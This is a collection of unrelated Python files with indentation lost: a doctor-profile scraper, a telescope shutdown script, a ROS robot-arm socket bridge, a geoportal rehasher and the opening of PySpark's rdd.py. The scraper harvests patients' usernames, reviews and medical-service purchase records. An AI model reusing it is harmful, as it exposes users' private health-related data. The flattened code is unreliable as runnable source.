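#   <url>?info=2&page=1#name3   -> getInfo4 : service purchase records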
def getInfo(url):
# Information on the page corresponding to e.g. http://club.xywy.com/familyDoctor/pay/43983196
try:
html = NetworkIO().requestHtml(url)
if html is not None:
# Doctor name
doctorName = html.findtext('.//i[@class="fwei fl"]')
doctorName = doctorName[:-6] if doctorName is not None and len(doctorName) > 6 else None
# Doctor title and hospital department
doctorRankAndHosp = html.find('.//div[@class=" lh200 pt10 f14"]')
doctorRank = doctorRankAndHosp.text
doctorHosp = doctorRankAndHosp.find('./br')
# Get the doctor's badges
medalsBlock = html.findall('.//div[@class="HomePth"]/span')
medals = ''
for medal in medalsBlock:
medals += medal.get('data-th') + ','
# The doctor's greeting message
sendWord = html.find('.//div[@class="f12 graydeep club_home_icon HomePj"]/span').tail
# The doctor's service types
serviceTypeBlock = {0: html.find('.//div[@class="fl pr"]'), 1: None}
if serviceTypeBlock[0] is None:
serviceTypeBlock[1] = html.find('.//div[@class="fl f14"]')
serviceTypes = {0: '', 1: ''}
oldServiceTypes = {0: '', 1: ''}
if serviceTypeBlock[0] is not None:
serviceTypeBlock2 = serviceTypeBlock[0].findall('.//a[@cate]')
for index, item in enumerate(serviceTypeBlock2):
for text in item.itertext():
serviceTypes[index] += text.strip()
elif serviceTypeBlock[1] is not None:
# Original price of each service
serviceTypeBlock2 = serviceTypeBlock[1].findall('.//a[@cate]')
for index, item in enumerate(serviceTypeBlock2):
for text in item.itertext():
serviceTypes[index] += text.strip()
serviceTypeBlock2 = serviceTypeBlock[1].findall('.//span[@class="f14 col99 ml10"]')
for index, item in enumerate(serviceTypeBlock2):
for text in item.itertext():
oldServiceTypes[index] += text.strip()
# User rating (scraped from the user review page instead)
# evaluateScore = html.findtext('.//span[@class="fl colClass01 fwei"]')
# Signed-up families and users helped
helpedInfo = {0: None, 1: None}
helpedInfoBlock = html.findall('.//span[@class="fb f16 ml5"]')
for index, item in enumerate(helpedInfoBlock):
helpedInfo[index] = item.text
# Specialties, bio and honors
infos = {0: '', 1: '', 2: ''}
infoBlock = html.findall('.//div[@class="HomeJie f14 fwei pt20"]')
for item in infoBlock:
tmp = item.findtext('./h4')
textblock = item.find('./div')
tmptext = ''
for text in textblock.itertext():
tmptext += text.strip()
if '擅长' in tmp:
infos[0] = tmptext
elif '简介' in tmp:
infos[1] = tmptext
elif '荣誉' in tmp:
infos[2] = tmptext
dbInfo = (url, doctorName, doctorRank, doctorHosp.tail, medals, sendWord, serviceTypes[0], serviceTypes[1],
oldServiceTypes[0], oldServiceTypes[1], helpedInfo[0], helpedInfo[1], infos[0], infos[1],
infos[2])
MySQL().saveDoctorInfo(dbInfo)
except:
doExpt('url1', url, 'url1')
def getInfo2(url):
# Aggregate user-review information on the page corresponding to e.g. http://club.xywy.com/familyDoctor/pay/43983196?info=1&page=2#name2
try:
html = NetworkIO().requestHtml(url)
if html is not None:
evaluateScore = html.findtext('.//h4[@class="f30 colClass01 fWei tc"]').strip()
evaluateStat = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0}
evaluateStatBlock = html.findall('.//div[@class="HomSptop_Ri fWei f14 mt20 fl"]/span')
for index, item in enumerate(evaluateStatBlock):
tmptext = item.text
evaluateStat[index] = 0 if len(tmptext) == 0 else int(tmptext[tmptext.find('(') + 1:tmptext.find(')')])
dbInfo = (url, evaluateScore, evaluateStat[0], evaluateStat[1], evaluateStat[2], evaluateStat[3],
evaluateStat[4], evaluateStat[5], evaluateStat[6], evaluateStat[7])
MySQL().saveDoctorEvaluation(dbInfo)
except:
doExpt('url2', url, 'url2')
def getInfo3(url):
# Individual user-review contents on the page corresponding to e.g. http://club.xywy.com/familyDoctor/pay/43983196?info=1&page=2#name2
try:
# On the first visit, fetch the review content and also the total number of review pages
html = NetworkIO().requestHtml(url)
if html is not None:
evaluateBlock = html.findall('.//div[@class="User_eval lh180 btn-a f14 fwei mt10"]')
for index, block in enumerate(evaluateBlock):
uName = block.findtext('.//span[@class="mr10 fl"]').strip()
evalAtti = block.findtext('.//span[@class="fl colbd mr10"]').strip()
evalScore = block.findtext('.//span[@class="colClass01 fl"]').strip()
evalText = block.findtext('.//div[@class="pt5"]').strip()
evalTime = block.findtext('.//span[@class="colbd f12 db pt10"]').strip()
dbInfo = (url + '#' + str(index), uName, evalAtti, evalScore, evalText,
datetime.strptime(evalTime, '%Y-%m-%d %H:%M:%S'))
MySQL().saveDoctorEvaluationText(dbInfo)
# Total number of review pages
totalPageInfo = html.find('.//div[@class="mt20 HomeFen f14"]/span[@class="mr5"]')
totalPageInfo = 1 if totalPageInfo is None else totalPageInfo.text.strip()[1:-3]
# Index of the current review page
tmpIndex = url.find('page=') + 5
currentPageIndex = url[tmpIndex:-6]
# Fetch the reviews from the pages after the current one
if int(currentPageIndex) < int(totalPageInfo):
for pageIndex in range(int(currentPageIndex) + 1, int(totalPageInfo) + 1):
url = url[:int(tmpIndex)] + str(pageIndex) + '#name2'
html = NetworkIO().requestHtml(url)
if html is not None:
evaluateBlock = html.findall('.//div[@class="User_eval lh180 btn-a f14 fwei mt10"]')
for index, block in enumerate(evaluateBlock):
uName = block.findtext('.//span[@class="mr10 fl"]').strip()
evalAtti = block.findtext('.//span[@class="fl colbd mr10"]').strip()
evalScore = block.findtext('.//span[@class="colClass01 fl"]').strip()
evalText = block.findtext('.//div[@class="pt5"]').strip()
evalTime = block.findtext('.//span[@class="colbd f12 db pt10"]').strip()
dbInfo = (url + '#' + str(index), uName, evalAtti, evalScore, evalText,
datetime.strptime(evalTime, '%Y-%m-%d %H:%M:%S'))
MySQL().saveDoctorEvaluationText(dbInfo)
except:
doExpt('url3', url, 'url3')
def getInfo4(url):
# Service purchase information on the page corresponding to e.g. http://club.xywy.com/familyDoctor/pay/43983196?info=2&page=2#name3
try:
html = NetworkIO().requestHtml(url)
if html is not None:
serviceBuyBlock = html.findall('.//div[@class="HomBone fwei f14"]')
for index, block in enumerate(serviceBuyBlock):
uName = block.findtext('.//span[@class="w100"]').strip()
serviceType = 1 if '包月' in block.findtext('.//span[@class="w200 tl"]').strip() else 0
serviceCount = block.findtext('.//span[@class="w60 tc"]').strip()
servicePrice = block.findtext('.//span[@class="colClass01 fb w80 tc"]').strip()
serviceStatus = block.findtext('.//span[@class="club_home_icon HomBsuc"]').strip()
serviceTime = block.findtext('.//span[@class="col99 ml20 tc"]').strip()
dbInfo = (url + '#' + str(index), uName, serviceType, serviceCount, servicePrice, serviceStatus,
serviceTime)
MySQL().saveServiceInfo(dbInfo)
# Total number of pages
totalPageInfo = html.find('.//div[@class="mt20 HomeFen f14"]/span[@class="mr5"]')
totalPageInfo = 1 if totalPageInfo is None else totalPageInfo.text.strip()[1:-3]
# Index of the current page
tmpIndex = url.find('page=') + 5
currentPageIndex = url[tmpIndex:-6]
# Fetch the records from the pages after the current one
if int(currentPageIndex) < int(totalPageInfo):
for pageIndex in range(int(currentPageIndex) + 1, int(totalPageInfo) + 1):
url = url[:int(tmpIndex)] + str(pageIndex) + '#name3'
html = NetworkIO().requestHtml(url)
if html is not None:
serviceBuyBlock = html.findall('.//div[@class="HomBone fwei f14"]')
for index, block in enumerate(serviceBuyBlock):
uName = block.findtext('.//span[@class="w100"]').strip()
serviceType = 1 if '包月' in block.findtext('.//span[@class="w200 tl"]').strip() else 0
serviceCount = block.findtext('.//span[@class="w60 tc"]').strip()
servicePrice = block.findtext('.//span[@class="colClass01 fb w80 tc"]').strip()
serviceStatus = block.findtext('.//span[@class="club_home_icon HomBsuc"]').strip()
serviceTime = block.findtext('.//span[@class="col99 ml20 tc"]').strip()
dbInfo = (url + '#' + str(index), uName, serviceType, serviceCount, servicePrice,
serviceStatus, serviceTime)
MySQL().saveServiceInfo(dbInfo)
except:
doExpt('url4', url, 'url4')
def doExpt(key, url, logIdentifier):
Redis().saveUrl(key, url)
FileIO.handleExpt(traceback.format_exc(), url, logIdentifier)
if __name__ == '__main__':
dbkey = input('请输入医生url列表名称:')
# threadList = []
# for i in range(5):
# tmpThread = threading.Thread(target=getQPageInfo, args=(tmpYear, None if tmpPwd == '' else tmpPwd))
# threadList.append(tmpThread)
# for tmpThread in threadList:
# tmpThread.start()
# for tmpThread in threadList:
# tmpThread.join()
jobs = []
for i in range(5):
jobs.append(gevent.spawn(getAllInfo, dbkey.strip()))
gevent.joinall(jobs)
|
ocs_end_of_night_thread.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import threading
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(threading.currentThread().getName()))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do end_of_night stuff
if entobj:
# disable
entobj.logger.info('{0:s}.disable()'.format(entity))
entobj.disable()
# standby
entobj.logger.info('{0:s}.standby()'.format(entity))
entobj.standby()
# exit control
entobj.logger.info('{0:s}.exitcontrol()'.format(entity))
entobj.exitcontrol()
# return
return
# +
# main()
# -
if __name__ == "__main__":
# create shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = threading.Thread(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s} exited'.format(j.name))
|
Hiwin_socket_ros_20190510101135.py
|
#!/usr/bin/env python3
# license removed for brevity
#Receive commands from the strategy side and forward them to the control PC over a socket
import socket
##multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import Hiwin_socket_TCPcmd as TCP
import Hiwin_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' #initial value of the transmitted data
Arm_feedback = 1 #assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #initial value of the response counter
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator is an error on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
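# Typical use of the switch/case recipe above (an illustrative sketch; the same
# pattern is used in socket_client() below):
#   for case in switch(value):
#       if case(1):
#           ...   # handle value == 1
#           break
#       if case():   # no argument matches everything -> default branch
#           ...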
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : '))
#start_input = 1
if start_input==1:
while 1:
##--------------- send arm commands over the socket -----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
s.send(data.encode('utf-8'))#send over the socket (encode the str for transmission)
feedback_str = s.recv(1024)
#the arm side sends back the arm state
###test 0403
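# feedback_str is a bytes object, so feedback_str[2] is an int in Python 3;
# '70', '84' and '54' are the ASCII codes of 'F', 'T' and '6' respectively.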
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##--------------- send arm commands over the socket end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / [     Indent/outdent line
|
rehasher.py
|
"""
Author: Michel Peltriaux
Organization: Spatial data infrastructure Rheinland-Pfalz, Germany
Contact: michel.peltriaux@vermkv.rlp.de
Created on: 22.01.19
"""
import threading
from collections import OrderedDict
from Geoportal.utils import utils
class Rehasher:
""" Merges categories and filters from all search result types (wms, wfs, dataset, wmc) into one dict for better handling
"""
def __init__(self, categories: dict, filters):
""" Constructor
Args:
categories (dict): Specifies which categories/resource types shall be worked on
filters: Specifies which filters will be used for rehashing
"""
self.all_categories = []
self.all_filters = filters
for category_key, category_val in categories.items():
self.all_categories.append(categories[category_key]["categories"]["searchMD"]["category"])
self.rehashed_categories = OrderedDict()
self.rehashed_filters = OrderedDict()
self.__parent_categories = []
self.__rehash()
self.__sort_by_count()
self.__mapbender_category_translation()
def __search_and_handle_subcat(self, c_subcat, rehashed_categories):
""" Searches a specific subcategory and recalculates the parent category count number
Since rehashing works multithreaded, we use these private functions for intra-class usage only!
Recounts the occurrences of a specific subcategory in the rehashed categories
and updates the count number for the parent category.
Only one subcategory per call will be searched and handled
Args:
c_subcat: Specifies the subcategory that we are looking for
rehashed_categories (list): A list with categories that shall be handled
Returns:
bool: True if the subcategory was found and handled, False otherwise.
"""
ret_val = False
for rehashed_category in rehashed_categories:
if rehashed_category["title"] == c_subcat["title"]:
# found the subcat in the rehashed categories
# update count number
rehashed_category["count"] = int(rehashed_category["count"]) + int(c_subcat["count"])
ret_val = True
break
return ret_val
def __sort_by_count(self):
""" Sort facets by number of count
Returns:
nothing
"""
for category_key, category_val in self.rehashed_categories.items():
category_val.sort(key=lambda x: int(x["count"]), reverse= True)
def __rehash_single_thread(self, datatype):
""" Rehashing of a single datatype
This is one of multiple multithreaded calls. Each datatype has its own
thread to be handled in.
Args:
datatype: Specifies the datatype that shall be handled.
Returns:
nothing
"""
for category in datatype:
# if there are no subcategories in the datatype but we haven't seen it yet, we take it anyway
# if there are no subcategories in this datatype and we know the category itself already, we pass it
if category.get("subcat", None) is None:
if category["title"] not in self.rehashed_categories:
self.rehashed_categories[category["title"]] = []
continue
else:
continue
if category["title"] not in self.rehashed_categories:
# this category is not known yet, add it!
self.rehashed_categories[category["title"]] = category["subcat"]
else:
# the category is already in the rehashed list
# we need to add the new subcategory elements to the existing ones
for c_subcat in category["subcat"]:
# if the category has already a subcat with the title of c_subcat we need to update the count number
# otherwise if the subcat we currently iterate over is not in the subcategories of the category, we append it
if not self.__search_and_handle_subcat(c_subcat, self.rehashed_categories[category["title"]]):
# Reaching this branch means no matching subcategory was found,
# so we add c_subcat to the list since it is unknown so far
self.rehashed_categories[category["title"]].append(c_subcat)
def __rehash(self):
""" Merges all four category dicts into one large.
Parent categories will be merged.
Count of subcategories will be updated.
Returns:
nothing
"""
thread_list = []
# 1) Rehash categories
for datatype in self.all_categories:
thread_list.append(threading.Thread(target=self.__rehash_single_thread, args=(datatype,)))
utils.execute_threads(thread_list)
# 2) Reorganize filter
# Reorganize means we need to get rid of certain elements, which are useless in this system and would disturb the handling in a later process
# only searchResources, orderFilter, maxResults and searchText from one datatype are needed, the rest is irrelevant
delete_keys = [
"isoCategories",
"searchResources",
"inspireThemes",
"customCategories",
"registratingDepartments"
]
for key in delete_keys:
if self.all_filters.get(key, None) is not None:
del self.all_filters[key]
self.rehashed_filters = self.all_filters
def __mapbender_category_translation(self):
""" Translates the rehashed categories
This is necessary, as the return values are sometimes handled in German.
Returns:
nothing
"""
translated_facets = OrderedDict(("Custom" if rehashed_key == "Sonstige" else rehashed_key, rehashed_value) for rehashed_key, rehashed_value in self.rehashed_categories.items())
self.rehashed_categories = translated_facets
def get_rehashed_categories(self):
""" Getter for rehashed categories
Returns:
dict: The rehashed categories
"""
return self.rehashed_categories
def get_rehashed_filters(self):
""" Getter for rehashed filters
Returns:
dict: The rehashed filters
"""
return self.rehashed_filters
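# Example of the input shape Rehasher expects (illustrative values; only the
# nesting accessed in __init__ is taken from this class):
#   categories = {
#       "wms": {"categories": {"searchMD": {"category": [
#           {"title": "ISO 19115", "subcat": [{"title": "Biota", "count": "3"}]},
#       ]}}},
#   }
#   rehasher = Rehasher(categories, {"maxResults": 10, "searchText": "*"})
#   facets = rehasher.get_rehashed_categories()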
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import operator
import shlex
import warnings
import heapq
import bisect
import random
from subprocess import Popen, PIPE
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
from typing import (
Any,
Callable,
Dict,
Generic,
Hashable,
Iterable,
Iterator,
IO,
List,
NoReturn,
Optional,
Sequence,
Tuple,
Union,
TypeVar,
cast,
overload,
TYPE_CHECKING,
)
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import (
AutoBatchedSerializer,
BatchedSerializer,
NoOpSerializer,
CartesianDeserializer,
CloudPickleSerializer,
PairDeserializer,
CPickleSerializer,
Serializer,
pack_long,
read_int,
write_int,
)
from pyspark.join import (
python_join,
python_left_outer_join,
python_right_outer_join,
python_full_outer_join,
python_cogroup,
)
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resource.requests import ExecutorResourceRequests, TaskResourceRequests
from pyspark.resource.profile import ResourceProfile
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import (
Aggregator,
ExternalMerger,
get_used_memory,
ExternalSorter,
ExternalGroupBy,
)
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration, _parse_memory
if TYPE_CHECKING:
import socket
import io
from pyspark._typing import NonUDFType
from pyspark._typing import S, NumberOrArray
from pyspark.context import SparkContext
from pyspark.sql.pandas._typing import (
PandasScalarUDFType,
PandasGroupedMapUDFType,
PandasGroupedAggUDFType,
PandasWindowAggUDFType,
PandasScalarIterUDFType,
PandasMapIterUDFType,
PandasCogroupedMapUDFType,
ArrowMapIterUDFType,
)
from pyspark.sql.dataframe import DataFrame
from pyspark.sql.types import AtomicType, StructType
from pyspark.sql._typing import AtomicValue, RowLike, SQLBatchedUDFType
from py4j.java_gateway import JavaObject # type: ignore[import]
from py4j.java_collections import JavaArray # type: ignore[import]
T = TypeVar("T")
T_co = TypeVar("T_co", covariant=True)
U = TypeVar("U")
K = TypeVar("K", bound=Hashable)
V = TypeVar("V")
V1 = TypeVar("V1")
V2 = TypeVar("V2")
V3 = TypeVar("V3")
__all__ = ["RDD"]
class PythonEvalType:
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF: "NonUDFType" = 0
SQL_BATCHED_UDF: "SQLBatchedUDFType" = 100
SQL_SCALAR_PANDAS_UDF: "PandasScalarUDFType" = 200
SQL_GROUPED_MAP_PANDAS_UDF: "PandasGroupedMapUDFType" = 201
SQL_GROUPED_AGG_PANDAS_UDF: "PandasGroupedAggUDFType" = 202
SQL_WINDOW_AGG_PANDAS_UDF: "PandasWindowAggUDFType" = 203
SQL_SCALAR_PANDAS_ITER_UDF: "PandasScalarIterUDFType" = 204
SQL_MAP_PANDAS_ITER_UDF: "PandasMapIterUDFType" = 205
SQL_COGROUPED_MAP_PANDAS_UDF: "PandasCogroupedMapUDFType" = 206
SQL_MAP_ARROW_ITER_UDF: "ArrowMapIterUDFType" = 207
def portable_hash(x: Hashable) -> int:
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to the one used by CPython 2.7
Examples
--------
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if "PYTHONHASHSEED" not in os.environ:
raise RuntimeError("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
Examples
--------
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
confidence: float
low: float
high: float
def __new__(cls, mean: float, confidence: float, low: float, high: float) -> "BoundedFloat":
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _create_local_socket(sock_info: "JavaArray") -> "io.BufferedRWPair":
"""
Create a local socket that can be used to load deserialized data from the JVM
Parameters
----------
sock_info : tuple
Tuple containing port number and authentication secret for a local socket.
Returns
-------
sockfile file descriptor of the local socket
"""
sockfile: "io.BufferedRWPair"
sock: "socket.socket"
port: int = sock_info[0]
auth_secret: str = sock_info[1]
sockfile, sock = local_connect_and_auth(port, auth_secret)
# The RDD materialization time is unpredictable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
return sockfile
def _load_from_socket(sock_info: "JavaArray", serializer: Serializer) -> Iterator[Any]:
"""
Connect to a local socket described by sock_info and use the given serializer to yield data
Parameters
----------
sock_info : tuple
Tuple containing port number and authentication secret for a local socket.
serializer : :py:class:`Serializer`
The PySpark serializer to use
Returns
-------
result of :py:meth:`Serializer.load_stream`,
usually a generator that yields deserialized data
"""
sockfile = _create_local_socket(sock_info)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def _local_iterator_from_socket(sock_info: "JavaArray", serializer: Serializer) -> Iterator[Any]:
class PyLocalIterable:
"""Create a synchronous local iterable over a socket"""
def __init__(self, _sock_info: "JavaArray", _serializer: Serializer):
port: int
auth_secret: str
jsocket_auth_server: "JavaObject"
port, auth_secret, self.jsocket_auth_server = _sock_info
self._sockfile = _create_local_socket((port, auth_secret))
self._serializer = _serializer
self._read_iter: Iterator[Any] = iter([]) # Initialize as empty iterator
self._read_status = 1
def __iter__(self) -> Iterator[Any]:
while self._read_status == 1:
# Request next partition data from Java
write_int(1, self._sockfile)
self._sockfile.flush()
# If response is 1 then there is a partition to read, if 0 then fully consumed
self._read_status = read_int(self._sockfile)
if self._read_status == 1:
# Load the partition data as a stream and read each item
self._read_iter = self._serializer.load_stream(self._sockfile)
for item in self._read_iter:
yield item
# An error occurred, join serving thread and raise any exceptions from the JVM
elif self._read_status == -1:
self.jsocket_auth_server.getResult()
def __del__(self) -> None:
# If local iterator is not fully consumed,
if self._read_status == 1:
try:
# Finish consuming partition data stream
for _ in self._read_iter:
pass
# Tell Java to stop sending data and close connection
write_int(0, self._sockfile)
self._sockfile.flush()
except Exception:
# Ignore any errors, socket is automatically closed when garbage-collected
pass
return iter(PyLocalIterable(sock_info, serializer))
class Partitioner:
def __init__(self, numPartitions: int, partitionFunc: Callable[[Any], int]):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, Partitioner)
and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc
)
def __call__(self, k: Any) -> int:
return self.partitionFunc(k) % self.numPartitions
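# Illustrative example: a Partitioner maps a key to a partition index, e.g.
#   p = Partitioner(2, portable_hash)
#   p("key")   # == portable_hash("key") % 2, i.e. 0 or 1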
class RDD(Generic[T_co]):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(
self,
jrdd: "JavaObject",
ctx: "SparkContext",
jrdd_deserializer: Serializer = AutoBatchedSerializer(CPickleSerializer()),
):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.has_resource_profile = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner: Optional[Partitioner] = None
def _pickled(self: "RDD[T]") -> "RDD[T]":
return self._reserialize(AutoBatchedSerializer(CPickleSerializer()))
def id(self) -> int:
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self) -> str:
return self._jrdd.toString()
def __getnewargs__(self) -> NoReturn:
# This method is called when attempting to pickle an RDD, which is always an error:
raise RuntimeError(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self) -> "SparkContext":
"""
The :class:`SparkContext` that this RDD was created on.
"""
return self.ctx
def cache(self: "RDD[T]") -> "RDD[T]":
"""
Persist this RDD with the default storage level (`MEMORY_ONLY`).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self: "RDD[T]", storageLevel: StorageLevel = StorageLevel.MEMORY_ONLY) -> "RDD[T]":
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (`MEMORY_ONLY`).
Examples
--------
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self: "RDD[T]", blocking: bool = False) -> "RDD[T]":
"""
